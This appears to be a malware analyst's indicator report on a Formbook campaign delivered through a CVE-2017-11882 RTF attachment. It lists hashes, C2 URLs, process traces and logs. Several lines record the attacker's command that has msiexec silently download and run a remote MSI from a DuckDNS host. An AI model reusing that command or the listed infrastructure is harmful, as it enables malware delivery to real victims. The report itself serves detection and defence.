#formbook_070519

1. #IOC #OptiData #VR #formbook #RTF11882 #exe2msi #opendir
2.  
3. https://pastebin.com/H2mkW82S
4.  
5. previous_contact:
6. 22/04/19 https://pastebin.com/1FMBBK3N
7. 26/02/19 https://pastebin.com/yLu1cL9K
8. 15/11/18 https://pastebin.com/VFG89LnT
9. 14/11/18 https://pastebin.com/D6VPDyyz
10.  
11. FAQ:
12. http://www.exetomsi.com/freeware
13.  
14. attack_vector
15. --------------
16. email attach .doc (RTF) > 11882 > msiexec GET msi > install (broken)
17.  
18. email_headers
19. --------------
20. n/a
21.  
22. files
23. --------------
24. SHA-256 167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7
25. File name PO-20190507.doc [RTF]
26. File size 311.08 KB (318542 bytes)
27.  
28. SHA-256 1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999
29. File name 1.msi [MSI Installer, Exe to msi converter free]
30. File size 556 KB (569344 bytes)
31.  
32. SHA-256 f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397
33. File name MSID06.tmp [PE32 executable (GUI) Intel 80386, for MS Windows]
34. File size 530.5 KB (543232 bytes)
35.  
36. activity
37. **************
38. PL_SCR h11p:\ joeing2{.} duckdns{.} org/joe/1.msi
39.  
40. C2 h11p:\kvkhbw{.} com/jo/
41. h11p:\7hprd{.} com/jo/
42. h11p:\.atlanticpressftp{.} com/jo/
43. h11p:\mohammadarif.info/jo/
44. h11p:\tdoog{.} com/jo/
45. h11p:\macounty{.} com/jo/
46. h11p:\aufdemweg.one/jo/
47. h11p:\interactivenetworksystems{.} com/jo/
48.  
49. cmd.exe & /C CD C: & msiexec.exe /i h11p:\ joeing2{.} duckdns{.} org/joe/1.msi /quiet
50.  
51. Error 1722. There is a problem with this Windows Installer package.
52. A program run as part of the setup did not finish as expected.
53. Contact your support personnel or package vendor.
54. Action _B3D13F97_1369_417D_A477_B4C42B829328, location: C:\Windows\Installer\MSI49E9.tmp, command: /S
55. === Logging stopped: ??.??.2019 11:24:24 ===
56.  
57. netwrk
58. --------------
59. 23.249.162.144 joeing2{.} duckdns{.} org GET /joe/1.msi HTTP/1.1 Windows Installer
60.  
61. comp
62. --------------
63. msiexec.exe 3096 TCP localhost 50104 23.249.162.144 80 ESTABLISHED
64.  
65. proc
66. --------------
67. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
68. ... [not children, another context]
69. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
70. ... [not children, another context]
71. C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
72. C:\Windows\SysWOW64\msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
73. ... [not children, another context]
74. C:\Windows\system32\msiexec.exe
75. "C:\Windows\Installer\MSI49E9.tmp" /S
76.  
77. persist
78. --------------
79. n/a
80.  
81. drop
82. --------------
83. C:\Windows\Installer\MSI49E9.tmp
84. %temp%\MSI6769f.LOG
85.  
86. # # #
87. https://www.virustotal.com/gui/file/167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7/details
88. https://www.virustotal.com/gui/file/1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999/details
89. https://www.virustotal.com/gui/file/f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397/details
90. https://analyze.intezer.com/#/analyses/33fac682-f65f-4ecd-82c5-1abf759a07a7
91. https://analyze.intezer.com/#/analyses/5b072d73-73f0-404a-ac75-3141ed972a9e
92. https://www.virustotal.com/gui/file/e22634d0f10eb26fe0503478c8027a0eabe734006e664014ada5e09a58097e91/details
93. https://analyze.intezer.com/#/analyses/2aaf18fe-3d54-4ca9-a002-32cad1f3f985
94.  
95. VR